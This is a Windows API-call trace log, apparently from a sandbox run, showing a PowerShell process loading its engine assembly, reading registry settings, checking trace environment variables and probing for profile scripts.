	[0728.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.848] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.849] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c060, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0728.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bfb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bff0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0731.084] VirtualQuery (in: lpAddress=0x26b670, lpBuffer=0x26c530, dwLength=0x30 | out: lpBuffer=0x26c530*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0731.089] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0731.089] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0731.089] CoTaskMemFree (pv=0x139a40) 
	[0732.623] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0732.623] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.624] CoTaskMemFree (pv=0x139a40) 
	[0732.624] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0732.624] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.624] CoTaskMemFree (pv=0x139a40) 
	[0732.625] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0732.625] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.625] CoTaskMemFree (pv=0x139a40) 
	[0732.628] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0732.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.629] CoTaskMemFree (pv=0x139a40) 
	[0732.634] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0732.634] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.634] CoTaskMemFree (pv=0x139a40) 
	[0732.636] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0732.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0732.636] CoTaskMemFree (pv=0x139a40) 
	[0732.642] VirtualQuery (in: lpAddress=0x26b670, lpBuffer=0x26c530, dwLength=0x30 | out: lpBuffer=0x26c530*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0737.059] VirtualQuery (in: lpAddress=0x26b670, lpBuffer=0x26c530, dwLength=0x30 | out: lpBuffer=0x26c530*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0737.080] CoTaskMemAlloc (cb=0x104) returned 0x139a40
	[0737.080] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x139a40, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0737.081] CoTaskMemFree (pv=0x139a40) 
	[0741.447] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x139e80
	[0741.450] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x139f90
	[0749.652] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0749.652] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0749.652] CoTaskMemFree (pv=0x13a0a0) 
	[0749.671] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0749.671] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0749.671] CoTaskMemFree (pv=0x13a0a0) 
	[0749.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0749.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0749.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0749.672] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c2d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c220, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0750.938] VirtualQuery (in: lpAddress=0x26b920, lpBuffer=0x26c7e0, dwLength=0x30 | out: lpBuffer=0x26c7e0*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0751.069] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d778 | out: phkResult=0x26d778*=0x310) returned 0x0
	[0751.070] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6fc, lpData=0x0, lpcbData=0x26d6f8*=0x0 | out: lpType=0x26d6fc*=0x1, lpData=0x0, lpcbData=0x26d6f8*=0x56) returned 0x0
	[0751.070] CoTaskMemAlloc (cb=0x5a) returned 0x1b8af0c0
	[0751.070] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6cc, lpData=0x1b8af0c0, lpcbData=0x26d6c8*=0x56 | out: lpType=0x26d6cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d6c8*=0x56) returned 0x0
	[0751.070] CoTaskMemFree (pv=0x1b8af0c0) 
	[0751.070] RegCloseKey (hKey=0x310) returned 0x0
	[0751.070] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d778 | out: phkResult=0x26d778*=0x310) returned 0x0
	[0751.070] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6fc, lpData=0x0, lpcbData=0x26d6f8*=0x0 | out: lpType=0x26d6fc*=0x1, lpData=0x0, lpcbData=0x26d6f8*=0x56) returned 0x0
	[0751.070] CoTaskMemAlloc (cb=0x5a) returned 0x1b8af0c0
	[0751.070] RegQueryValueExW (in: hKey=0x310, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x26d6cc, lpData=0x1b8af0c0, lpcbData=0x26d6c8*=0x56 | out: lpType=0x26d6cc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x26d6c8*=0x56) returned 0x0
	[0751.070] CoTaskMemFree (pv=0x1b8af0c0) 
	[0751.071] RegCloseKey (hKey=0x310) returned 0x0
	[0751.072] CoTaskMemAlloc (cb=0x20c) returned 0x1b864970
	[0751.073] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b864970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0751.074] CoTaskMemFree (pv=0x1b864970) 
	[0751.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d330, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0751.074] CoTaskMemAlloc (cb=0x20c) returned 0x1b864970
	[0751.074] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b864970 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0751.074] CoTaskMemFree (pv=0x1b864970) 
	[0751.074] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d330, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0751.075] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0751.075] SetErrorMode (uMode=0x1) returned 0x1
	[0751.075] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d6e0 | out: lpFileInformation=0x26d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0751.075] SetErrorMode (uMode=0x1) returned 0x1
	[0751.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0751.076] SetErrorMode (uMode=0x1) returned 0x1
	[0751.076] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d6e0 | out: lpFileInformation=0x26d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0751.076] SetErrorMode (uMode=0x1) returned 0x1
	[0751.076] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0751.076] SetErrorMode (uMode=0x1) returned 0x1
	[0751.076] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d6e0 | out: lpFileInformation=0x26d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0751.076] SetErrorMode (uMode=0x1) returned 0x1
	[0751.077] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0751.077] SetErrorMode (uMode=0x1) returned 0x1
	[0751.077] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d6e0 | out: lpFileInformation=0x26d6e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0751.077] SetErrorMode (uMode=0x1) returned 0x1
	[0751.077] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0751.077] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.078] CoTaskMemFree (pv=0x13a0a0) 
	[0751.079] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0751.079] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.079] CoTaskMemFree (pv=0x13a0a0) 
	[0751.081] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0751.082] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.082] CoTaskMemFree (pv=0x13a0a0) 
	[0751.084] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0751.084] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0751.084] CoTaskMemFree (pv=0x13a0a0) 
	[0751.090] CoTaskMemAlloc (cb=0x104) returned 0x13a0a0
	[0751.090] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x13a0a0, nSize=0x80 | out: lpBuffer="") returned 0x0
